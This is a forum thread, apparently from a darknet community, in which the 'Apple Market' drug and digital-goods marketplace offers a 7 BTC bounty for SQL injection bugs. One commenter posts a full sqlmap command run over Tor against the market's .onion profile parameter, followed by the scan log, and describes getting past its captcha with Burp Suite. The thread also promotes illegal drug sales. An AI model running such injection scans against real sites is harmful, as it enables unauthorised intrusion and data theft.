Apple Market Bounty.

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Hello darknet users.

It came to our attention that we have some bugs. We are announcing a bug bounty of 7BTC which we will pay to anyone that can find any SQL injection relating to the current problem being discussed on the threads.

Let us take this time as a group to say that we are not entirely happy with the way /u/LSDchemist has handled this. We worked on this together and he is part of the team.

He is very passionate about this hence his attitude. On behalf of him we apologize to the community as a whole and are willing to work with anyone who finds a way to make Apple Market a better place.

A finger alone can't punch a man but a clenched fist has the ability to strike a knockout punch.

We are strong when we are united and when we are alone we are weak, so let us stand together and not be divided but be united. We are pleased with how the community has embraced us as a market even after initially bashing us.

Our unique selling point is that we are a community market and we will always work with the community. Two heads are better than one and the more people we have working with us, the better we will be.

So far in the less than a month that we have under our belt, this is what we have achieved:

  1. We have Over 1,000 drug listings and 1,000 digital listings.

  2. We have suspended 12 scam vendors before they could scam our users and in one case refunded the users money (We did not beg him for a review on reddit or anywhere).

  3. We have banned 150 products and deleted more.

All this would not be possible without you the community. We also encrypt our users address so even if LE had our server they would find absolutely nothing.

Any grey Hat that is willing to work with us to make Apple Market more secure is welcome to hack away.

A 7BTC bounty awaits you if you find any SQL injection on Apple Market, we will pay for any other problem depending on it's severity.

Help us serve you better.

PS - We have multisig AND an amazing forum.

-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJW7Ag2AAoJEIrH0ZHFMeOiZfsP/2BLIbaynlulHyppDNWnpOwl
HPzCz05od99DketL5ULnl+/Ee2V5z8ooS0I+KQmJ85ht8soHRvs7dt4crE+1Pc/S
Dswp8hXeN56X5O+7X5Du5XNwvWSqQWlRGMzLYghJDqQkoYyU0KjuJ1gYkTUAxXGr
jlJ3/I0e+o/o4G5TiOvoszEr9WG3twaubhjaZ404EH8/c9VcbL/G/A8Yzm48ZVdz
564Te8/2PXbzdu5F0CoLuDrRmjyvp5Qs6vFXhMfLz+p3wm7gIYikiYUmjN+WTxfY
lfy1SfVNwvlQlpmR9Qq9AyKyHM43v4AU5UdD1padN53gL81qYAlWVMIHWXcNgbS6
JZuOtMNLbgi9yDH4raJOnb/NDVeqW2LglQTuk8052iLpI49fJryuScQw60eBL9a8
7FKDGF2CxKCC+4Mimgr/BmaNLjyZhwt+r8+VQfGbINHwAjp7DUFE35qPuxeg8/rG
W4F1HmY/ZxLkNAxO2AX7rZy3gOdXbIUUA7xD/5u2am1GN+HYPjRrQbVEudZ9sXKe
MitJDbCZc8wfMlcVqj5BAPPtq/UhdrAJgUs6apF0/A5GycSGfhUDRzeb/1u9f9UY
Rj3xKZUv9Tc/OSCdzKDs5+BBsuerOU3qbkufnWj6J8AeD7/sFnu35Hv9D5t27dK2
uacnpiAHU8QIUCPlXYJH
=x7AS
-----END PGP SIGNATURE----- 


Comments


[2 Points] None:

well I'm going to go after the Bounty


[2 Points] crystaldust:

i can help make your site look better. i see you have new logos for the forum and stuff. i went ahead and rendered you a proper capsule logo. i did it in three-d with polished steel texture and black logo like apple products. i see your using the logo i made out of a photo that is pretty cool. problem is your site was down when i made that so the color is way off from the blue grey your using. these are a lot better.

brushed steel apple logos dark/light big small

if you want a smooth unifying approach i can change all your footer logos to be the correct sizes without back grounds etc... as well.

wire frame sketch logos - any orientation is possible

these chrome gloss ones with orientation shift look pretty awesome.

orientation shift chrome gloss light effect

so i don't know, i'm bored lately and would totally help make your site look a bit a better. would have to coordinate with a developer to give files for updating etc.. no coin really necessary, unless you want to spot a fraction or two i'm not going to complain.

now as far as penetration testing is concerned, i'm not your guy.

i'm a little familiar with sql injections but not very familiar with capturing from tor nodes. so i wouldn't really be someone you would want to count on for a definitive security answer. your hidden service and user database information is really important.

product.php?id=1 ironically is a book called "Hack With IP Address" id=1 is "Hack Wifi"

I have been able to successfully hack a wifi with packet injections and brute force etc.. after collective enough unique iv's from hand shaking a router with multiple computers. its much faster to do when the router is on your network and you just forgot the password.

sqlmap.py -u "http://254iloft5cheh2y2 dot onion/profile.php?user=" --dbs --tor --tor-type=SOCKS5 --tor-port=9150 --random-agent --check-tor --tamper=space2comment

running a simple sql injection over tor to check for any database vulnerabilities doesn't work with your site. an attack like this is usually pretty easy dump some data but i don't think the injection even gets past your ddos captcha.

[04:42:57] [INFO] setting Tor SOCKS proxy settings
[04:42:57] [INFO] fetched random HTTP User-Agent header from file /txt/user-agents.txt'...
[04:42:57] [INFO] checking Tor connection
[04:43:01] [INFO] Tor is properly being used
 [04:43:01] [INFO] testing connection to the target URL

sqlmap got a 302 redirect to 'http://254iloft5cheh2y2 dot onion:80/ddos.php'. Do you want to follow?

seems the redirect fits its purpose. at this point i would proxy a burp suite get, with your site header information and captcha filled out to forward past your ddos and get to the user log in screen and check there or repeat the burp suite forward with my user credentials then see if there are vulnerabilities inside your site. however even if i am able to configure burp suite to proxy tor interception with a .com the hidden .onion is elusive.

[04:43:17] [INFO] testing if the target URL is stable
[04:43:18] [WARNING] GET parameter 'user' does not appear dynamic

[04:43:18] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be inject-able

[04:43:20] [INFO] testing for SQL injection on GET parameter 'user'
[04:43:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:43:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[04:43:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY 

a basic sql map injection dump can't even determine what kind of database your using, like if your using Oracle, Microsoft, or PostgreSQL etc.... So for me that's about the extent of my sql injection and proxy interceptions, using burp suite and sql map

[04:37:21] [WARNING] heuristic (basic) test shows that GET parameter 'debit' might not be injectable

using a interception proxy passive or active scanner like zaproxy through a torsocks tunnel might be something a bit more robust and provide some maybe more useful information ? i found this site ojscurity to have lots of interception attacks.

[04:44:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'

i don't even have privoxy running and am just talking shit at this point. in general i guess the theory would be to scan and or capture tor port and exit node data. im not really into security or forensics stuff. like im not trying to steal from people so my angler exploit skills are minimal. i know just enough to crack some software, i have had my software cracked before.

[04:43:01] [TRUTH] its a game that never ends, which provides something new to learn all time.

you might want to read about Cisco's NetFlow and other metadata-based analyses is now essential to full packet capture encrypted traffic such as tor.

cisco-annual-security-report-2016

[04:47:14] [CRITICAL] all tested parameters appear to be not injectable.

again please don't read any of this as secure all tested parameters appear to be not injectable. sounds pretty nice but that's only from an initial sql map dump


[2 Points] crystaldust:

once i changed the lighting texture and orientation of the apple market logo, its looking really stunning. once i get a three button mouse (dog ate my stylus, battery blew up in mouse) i will be able to actually drive in three-d and make something much better. right now its a bit difficult to navigate without left right and middle click. with a little time we can get you the best logo on the markets ?

http://imgur.com/DODO9uL

here is some working files for you.

orientation shift chrome gloss light effect


[2 Points] crystaldust:

orientation shift chrome gloss light effect apple market logos


[2 Points] None:

Well, I created an account named Admin_. You might want to, you know, uh, prevent that.


[1 Points] FrackingIsNotGood:

Nigga you are LSDChemist! Can't fool anybody , do y'all have a exit scam date or are y'all going to do it when you meet a certain btc threshold ?


[1 Points] noonehear:

Why not contact Apple (the iPhone maker) and just give them your url? I'm sure the name similarity will piss them off enough to find your bugs...